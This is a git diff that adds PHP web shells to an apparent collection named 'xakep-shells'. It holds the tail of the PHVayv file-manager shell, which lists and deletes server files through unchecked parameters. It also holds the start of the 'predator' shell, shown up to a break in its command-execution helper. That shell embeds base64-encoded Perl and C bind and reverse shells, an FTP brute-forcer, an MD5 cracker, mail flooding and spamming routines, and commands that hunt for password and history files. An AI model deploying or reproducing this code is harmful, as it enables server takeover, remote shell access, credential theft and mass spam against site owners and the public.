+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan Klas�r</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
+                onmouseover='this.style.background="D9D9D9"'
+                onmouseout='this.style.background="9F9F9F"'
+                style="CURSOR: hand"
+                
+                
+                
+                
+                >
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+
+
+
+
+
+                <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
+                <font color="#000000">�st Klas�r</font></a></font></td>
+
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klas�r</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+  
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;T�r</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Ad�</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;��lem</font></td>
+  </tr>
+</table>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_dir("$dizin/$ekinci")){
+?>
+
+<? if ($ekinci=="." or  $ekinci=="..") {
+} else {
+?>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
+        <font color="#000000">A�</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+<?
+}
+?>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_file("$dizin/$ekinci")){
+
+?>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( XXX )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6"
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
+        <font color="#000000">D�zenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    </body></html><? } ?><? } ?><? } ?><? } ?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/predator.php.php.txt b/xakep-shells/PHP/predator.php.php.txt
new file mode 100644
index 0000000..19e2ed7
--- /dev/null
+++ b/xakep-shells/PHP/predator.php.php.txt
@@ -0,0 +1,1367 @@
+<?php
+$auth = 0;
+
+
+
+ini_set("session.gc_maxlifetime",1);
+session_start();
+error_reporting(0);
+safe_mode();
+$name="9b534ea55d0b82c3a7e80003a84b6865";     //login = 'mylogin'
+$pass="a029d0df84eb5549c641e04a9ef389e5";     //pass  = 'mypass'
+if($auth == 1){
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"PanelAccess\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+}
+
+if($_GET['kill']=='yes')
+{
+unlink($_SERVER['SCRIPT_FILENAME']);
+echo "<script>alert('Your shell script was succefully deleted!')</script>";
+}
+
+
+function md5_brute($hash,$log,$dict)
+{
+ignore_user_abort(1);
+set_time_limit(0);
+
+$fl = fopen($dict, "r");
+$fl = fopen($log, "w");
+$count = 0;
+if(!$dict){
+return "Fill 'dictionary_file' field!";
+}if(!$log){
+return "Fill 'log_file' field!";
+}elseif(!strlen($hash) == 0){
+return "Fill 'md5_hash' field!";
+}else{
+	while(!$feof($dict)){
+		$pass = fgets($dict);
+		$brute_hash = md5($pass);
+		if($brute_hash == $hash){
+			fputs($log, "$hash:$pass\n---");
+			fclose($dict);
+			fclose($log);
+			exit;
+		}else{
+			$count = $count + 1;
+			fputs($log, "$count passwords was bruted...");
+		}
+	}
+	fputs($log, "$count passwords are failed!");
+}
+fclose($dict);
+fclose($log);
+}
+
+function port_bind($port,$pass,$method)
+{
+$perl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+
+if($method=='Perl')
+	{
+		fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl));
+		fclose($i);
+		ex(which("perl")." /tmp/shlbck ".$port." &");
+		unlink("/tmp/shlbck");
+		return ex('ps -aux | grep shlbck');
+	}
+elseif($method=='C#')
+	{
+		fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c));
+		fclose($i);
+		ex("gcc shlbck.c -o shlbck");
+		unlink('shlbck.c');
+		ex("/tmp/shlbck ".$port." ".$pass." &");
+		unlink("/tmp/shlbck");
+		return ex('ps -aux | grep shlbck');
+	}else
+	{
+	return 'Choose method';
+	}
+
+}
+
+function backconnect($ip,$port,$method)
+{
+$perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+if($method=='Perl')
+	{
+		fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl));
+		fclose($i);
+		ex(which("perl")." /tmp/shlbck ".$ip." ".$port." &");
+		unlink("/tmp/shlbck");
+		return ex('netstat -an | grep -i listen');
+	}
+elseif($method=='C#')
+	{
+		fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c));
+		fclose($i);
+		ex("gcc shlbck.c -o shlbck");
+		unlink('shlbck.c');
+		ex("/tmp/shlbck ".$ip." ".$port." &");
+		unlink("/tmp/shlbck");
+		return ex('netstat -an | grep -i listen');
+	}else
+	{
+	return 'Choose method';
+	}
+}
+
+if($_POST['type']==11){download(stripslashes($_POST['value']));};
+
+function download($dfilename)
+{
+	$file=fopen($dfilename,"r");
+	ob_clean();
+    $filename = basename($dfilename);
+    $filedump = fread($file,@filesize($dfilename));
+    fclose($file);
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");   
+    echo $filedump;
+}
+
+function flooder($logf,$to,$from,$subject,$msg,$amount,$check)
+{
+ignore_user_abort(1);
+set_time_limit(0);
+
+$fl = fopen($logf, "w");
+$count = 0;
+if(!$logf){
+return "Fill 'log_file' field!";
+}elseif(!$to){
+return "Fill 'Send to' field!";
+}elseif(!$from){
+return "Fill 'From' field!";
+}elseif(!$subject){
+return "Fill 'Subject' field!";
+}elseif(!$msg){
+return "Fill 'Message' field!";
+}elseif(!$amount){
+return "Fill 'Amount' field!";
+}else{
+	while($count < $amount){
+		mail("$to", "$subject", "$msg", "From: $from");
+		$count = $count + 1;
+		$fl = fopen($logf, "w");
+		fputs($fl, "$count flood-letters was sended...");
+		fclose($fl);	
+	}
+	if(strlen($check) != 0){
+		$check_text = "Done! $count flood-letters was sended!";
+		$check_sub = 'Check';
+		mail("$check", "$check_sub", "$check_text", "From: $from");
+		$fl = fopen($logf, "w");
+		fputs($fl, "Done! $count flood-letters was sended!");
+	}
+	else{
+		$fl = fopen($logf, "w");
+		fputs($fl, "Done! $count flood-letters was sended!");
+	}
+}
+fclose($fl);
+}
+
+function ftp_brute($host,$ftp_users,$ftp_passwd,$ftp_log)
+{
+ignore_user_abort(1);
+set_time_limit(0);
+
+$fl = fopen($ftp_users, "r");
+$fd = fopen($ftp_passwd, "r");
+$fr = fopen($ftp_log, "a+");
+if(!$host){
+return "Fill 'Host' field!";
+}elseif(!$ftp_users){
+return "Fill 'ftp_users file' field!";
+}elseif(!$ftp_passwd){
+return "Fill 'ftp_passwd file' field!";
+}elseif(!$ftp_log){
+return "Fill 'ftp_log file' field!";
+}elseif(!file_exists($ftp_users)){
+return "File ".$ftp_users." doesn't exists!";
+}elseif(!file_exists($ftp_passwd)){
+return "File ".$ftp_passwd." doesn't exists!";
+}
+else{
+	while(!feof($fd)){
+        	$pass = fgets($fd);
+                	while(!feof($fl)){
+                        	$user = fgets($fl);
+                                $connect = ftp_connect($host);
+                                if(!$connect){
+                                	fputs($fr, "Enable connect to $host\n");
+                                        exit;
+                                }else{
+                                	$auth = ftp_login($connect, $user, $pass);
+                                	if(!$auth){
+                                		ftp_quit($connect);
+                                	}
+                                	else{
+                                		fputs($fr, "$host:\n---$login:$pass\n---");
+                                		ftp_quit($connect);
+                                	} 
+                                }
+                	}
+	}
+	fputs($fr, "Done:\n");
+	fclose($fr);
+}
+fclose($fl);
+fclose($fd);
+}
+
+function spammer($from,$subject,$msg,$check,$elist,$logf)
+{
+ignore_user_abort(1);
+set_time_limit(0);
+
+$fp = fopen($elist. "r");
+$fl = fopen($logf, "w");
+$count = 0;
+if(!$from){
+return "Fill 'From' field!";
+}elseif(!$elist){
+return "Fill 'Emails list' field!";
+}elseif(!$logf){
+return "Fill 'Log File' field!";
+}elseif(!$msg){
+return "Fill 'Message' field!";
+}elseif(!$subject){
+return "Fill 'Subject' field!";
+}elseif(!file_exists($elist)){
+return "File ".$elist." doesn't exists!";
+}else{
+	while(!feof($fp)){
+		$to = fgets($fp);
+		mail("$to", "$subject", "$msg", "From: $from");
+		$count = $count + 1;
+		$fl = fopen($logf, "w");
+		fputs($fl, "$count letters was sended...");
+		fclose($fl);
+	}
+	if(strlen($check) != 0){
+		$check_text = "Done! $count letters was sended!";
+		$check_sub = 'Check';
+		mail("$check", "$check_sub", "$check_text", "From: $from");
+		$fl = fopen($logf, "w");
+		fputs($fl, "Done! $count letters was sended!\n");
+	}
+	else{
+		$fl = fopen($logf, "w");
+		fputs($fl, "Done! $count letters was sended!");
+	}
+}
+fclose($fp);
+fclose($fl);
+}
+
+function alias($in)
+{
+if($in=="find apahce config file"){return ex('find / -type f -name httpd.conf');}
+elseif($in=="find access_log files"){return ex('find / -type f -name access_log');}
+elseif($in=="find error_log files"){return ex('find / -type f -name error_log');}
+elseif($in=="find suid files"){return ex('find / -type f -perm -04000 -ls');}
+elseif($in=="find suid files in current dir"){return ex('find . -type f -perm -04000 -ls');}
+elseif($in=="find sgid files"){return ex('find / -type f -perm -02000 -ls');}
+elseif($in=="find sgid files in current dir"){return ex('find . -type f -perm -02000 -ls');}
+elseif($in=="find config.inc.php files"){return ex('find / -type f -name config.inc.php');}
+elseif($in=="find config.inc.php files in current dir"){return ex('find . -type f -name config.inc.php');}
+elseif($in=="find config* files"){return ex('find / -type f -name "config*"');}
+elseif($in=="find config* files in current dir"){return ex('find . -type f -name "config*"');}
+elseif($in=="find all writable files"){return ex('find / -type f -perm -2 -ls');}
+elseif($in=="find all writable files in current dir"){return ex('find . -type f -perm -2 -ls');}
+elseif($in=="find all writable directories"){return ex('find / -type d -perm -2 -ls');}
+elseif($in=="find all writable directories in current dir"){return ex('find . -type d -perm -2 -ls');}
+elseif($in=="find all writable directories and files"){return ex('find / -perm -2 -ls');}
+elseif($in=="find all writable directories and files in current dir"){return ex('find . -perm -2 -ls');}
+elseif($in=="find all service.pwd files"){return ex('find / -type f -name service.pwd');}
+elseif($in=="find service.pwd files in current dir"){return ex('find . -type f -name service.pwd');}
+elseif($in=="find all .htpasswd files"){return ex('find / -type f -name .htpasswd');}
+elseif($in=="find .htpasswd files in current dir"){return ex('find . -type f -name .htpasswd');}
+elseif($in=="find all .bash_history files"){return ex('find / -type f -name .bash_history');}
+elseif($in=="find .bash_history files in current dir"){return ex('find . -type f -name .bash_history');}
+elseif($in=="find all .mysql_history files"){return ex('find / -type f -name .mysql_history');}
+elseif($in=="find .mysql_history files in current dir"){return ex('find . -type f -name .mysql_history');}
+elseif($in=="find all .fetchmailrc files"){return ex('find / -type f -name .fetchmailrc');}
+elseif($in=="find .fetchmailrc files in current dir"){return ex('find . -type f -name .fetchmailrc');}
+elseif($in=="list file attributes on a Linux second extended file system"){return ex('lsattr -va');}
+elseif($in=="show opened ports"){return ex('netstat -an | grep -i listen');}
+elseif($in=="---------------------------------------------------------------------------------------------------------"){return ex('ls -la');}
+}
+
+function testperl()
+{
+	if(ex('perl -h'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function testlynx()
+{
+	if(ex('lynx --help'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function testfetch()
+{
+	if(ex('fetch --help'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function testwget()
+{
+	if(ex('wget --help'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function oracle()
+{
+	if(function_exists('ocilogon'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function postgresql()
+{
+	if(function_exists('pg_connect'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function testmssql()
+{
+	if(function_exists('mssql_connect'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+function testcurl()
+{
+	if(function_exists('curl_version'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+function testmysql()
+{
+	if(function_exists('mysql_connect'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+function safe_mode()
+{
+if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3)
+	{
+		$_SESSION['safe_mode'] = 1;
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		$_SESSION['safe_mode'] = 0;
+		return "<font size=2 color=red>OFF</font>";
+	}
+};
+
+function ex($in)
+{
+$out = '';
+
+
+if(function_exists('exec'))
+	{
+		exec($in,$out);
+		$out = join("\n",$out);
+	}
+elseif(function_exists('passthru'))
+	{
+		ob_start();
+		passthru($in);
